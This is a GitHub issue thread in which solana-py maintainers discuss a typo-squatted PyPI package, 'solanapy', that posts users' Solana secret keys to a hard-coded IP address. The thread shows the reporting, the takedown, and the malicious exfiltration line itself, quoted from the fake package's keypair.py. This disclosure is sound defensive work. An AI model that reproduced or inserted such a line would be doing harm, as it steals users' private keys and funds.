### ISSUE TITLE
Typo-squatting attack targetting solana-py users

### ISSUE THREAD

**Issue by kai-alpha** [michaelhly/solana-py#285]
```
$ python3 -m venv .
$ . bin/activate
$ pip3 install solanapy
$ grep -nHr api.php lib
Binary file lib/python3.8/site-packages/solana/__pycache__/keypair.cpython-38.pyc matches
lib/python3.8/site-packages/solana/keypair.py:85:        requests.post('http://80.78.25.59/api.php', data={"keypair": str(secret_key), "package":"solanapy"})
```

This isn't yours, is it? https://pypi.org/project/solanapy/
(Genuine Pypi page is https://pypi.org/project/solana/ )

Probably related: https://twitter.com/pypi/status/1562442188285308929

**Comment by kevinheavey** [comment]
Yeah this is not ours, yikes

**Comment by kevinheavey** [comment]
> Probably related: https://twitter.com/pypi/status/1562442188285308929

Unrelated I think as there's no phishing involved. Anyone know how to get malicious PyPI packages taken down? cc @michaelhly

**Comment by kevinheavey** [comment]
Reporting it per these instructions https://pypi.org/security/

**Comment by kevinheavey** [comment]
Thanks for raising this. To be clear to anyone reading, the genuine PyPI package "solana" is unaffected and there's been no security breach. But this scam package is very bad and we have contacted PyPI to get it taken down asap

**Comment by kevinheavey** [comment]
The malicious package has been removed from pypi
